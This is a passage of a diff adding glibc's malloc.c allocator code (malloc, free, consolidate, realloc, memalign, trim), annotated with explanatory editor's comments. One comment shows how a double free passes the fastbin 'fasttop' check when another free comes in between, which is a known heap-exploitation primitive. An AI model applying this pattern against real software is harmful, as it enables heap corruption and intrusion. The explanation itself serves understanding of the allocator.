+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
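+/* [Editor's note -- illustrative, not upstream text.]  Taken as a whole,
+   _int_malloc above tries its sources in a fixed order: fastbins, an
+   exact-fit small bin, the unsorted list (consolidating fastbins first for
+   large requests), the sorted large bins and the binmap scan, and finally
+   the top chunk, a consolidate-and-retry, or sysmalloc.  With default
+   tuning on a 64-bit build the size classes work out to:
+
+     tcache (checked earlier, in __libc_malloc): chunk sizes 0x20 .. 0x410,
+                                                 64 bins of 7 entries each
+     fastbins   : chunk sizes 0x20 .. 0x80   (get_max_fast () == 128)
+     small bins : chunk sizes 0x20 .. 0x3f0  (below MIN_LARGE_SIZE == 0x400)
+     large bins : chunk sizes 0x400 and up
+*/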
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
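+/* [Editor's sketch -- illustrative only, not upstream code.]  The "fasttop"
+   test in _int_free above compares the chunk being freed only against the
+   current head of its fastbin, so it catches an immediate double free but
+   not one with another free in between.  Assuming the chunks actually reach
+   the fastbin (no tcache, or the matching tcache bin is already full):
+
+     void *a = malloc (0x20), *b = malloc (0x20);
+
+     free (a); free (a);            // aborts: "double free or corruption
+                                    //          (fasttop)" -- the head is a
+     free (a); free (b); free (a);  // passes: the head is b on the second
+                                    // free of a; fastbin now a -> b -> a
+*/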
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  unlink(av, p, bck, fwd);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink(av, nextchunk, bck, fwd);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8-byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
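+/* [Editor's note -- illustrative, not upstream text.]  A concrete run of the
+   "expand forward into top" case above, assuming a 64-bit build: with oldp
+   of chunk size 0x90 sitting directly below a 0x20000-byte top chunk, a
+   realloc whose padded size nb is 0x110 returns the same user pointer --
+   oldp's size field becomes 0x110, av->top moves forward by 0x80, and the
+   new top chunk has size 0x20000 - 0x80 == 0x1ff80, still PREV_INUSE.  */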
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    {
+      /* Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.  */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
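+/* [Editor's note -- illustrative, not upstream text.]  The alignment
+   arithmetic in _int_memalign above rounds the malloc'd user pointer m up
+   to the next multiple of the requested alignment and then steps back to
+   the matching chunk header.  For example, with alignment == 0x100 and
+   m == 0x55500010: (m + 0xff) & -0x100 == 0x55500100, so brk points at
+   0x555000f0 (two size words lower); the 0xf0-byte leader is >= MINSIZE
+   and is handed back through _int_free, and chunk2mem (newp) is the
+   aligned address 0x55500100.  */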
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
